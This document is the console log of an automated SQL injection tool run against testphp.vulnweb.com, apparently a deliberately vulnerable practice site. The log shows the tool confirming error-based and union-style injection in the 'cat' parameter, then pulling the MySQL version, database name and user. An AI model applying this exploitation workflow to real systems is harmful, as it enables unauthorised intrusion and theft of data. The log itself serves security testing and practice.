[16:18:29,320] Starting new injection: http://testphp.vulnweb.com/listproducts.php?cat=1
[16:18:29,320] Connection test...
[16:18:29,523] Found status HTTP 200 Success
[16:18:29,616] Found 1 <form> in HTML body while status 200 Success:
<form action="search.php?test=query" method="post" />
    <input name="searchFor" value="" />
    <input name="goButton" value="go" />
[16:18:29,616] Checking insertion characters...
[16:18:29,773] Found character insertion [-1] in place of [1] to detect error on ORDER BY
[16:18:29,773] Add manually the character * like [1*] to force the value [1]
[16:18:29,773] Using insertion character [-1]
[16:18:29,961] Found database [MySQL]
[16:18:29,961] Using database [MySQL]
[16:18:29,961] Checking strategy Time...
[16:18:30,433] Checking strategy Blind...
[16:18:31,351] Checking strategy Error...
[16:18:31,351] Checking BIGINT::exp...
[16:18:31,539] Checking BIGINT::exp in Order By...
[16:18:31,726] Checking BIGINT::exp in Delete Update Insert...
[16:18:31,838] Checking DOUBLE::exp...
[16:18:32,025] Checking DOUBLE::exp in Order By...
[16:18:32,212] Checking DOUBLE::exp in Delete Update Insert...
[16:18:32,322] Checking GROUPBY::floor_rand...
[16:18:32,618] Vulnerable to GROUPBY::floor_rand using 60 characters
[16:18:32,618] Checking GROUPBY::floor_rand in Order By...
[16:18:32,806] Checking GROUPBY::floor_rand in Delete Insert Update...
[16:18:32,932] Checking JSON::json_keys...
[16:18:33,119] Checking JSON::json_keys in Order By...
[16:18:33,306] Checking JSON::json_keys in Delete Insert Update...
[16:18:33,416] Checking XML::extractvalue...
[16:18:33,792] Vulnerable to XML::extractvalue using 27 characters
[16:18:33,792] Checking XML::extractvalue in Order By...
[16:18:33,981] Checking XML::extractvalue in Delete Insert Update...
[16:18:34,075] Checking strategy Normal...
[16:18:35,968] Vulnerable to Normal injection using 76565 characters
[16:18:35,968] Using strategy [Normal]
[16:18:35,968] Fetching informations...
[16:18:36,173] Database [acuart] on MySQL [5.1.73-0ubuntu0.10.04.1] for user [acuart@localhost]
[16:18:36,173] Fetching databases...
[16:18:36,563] Done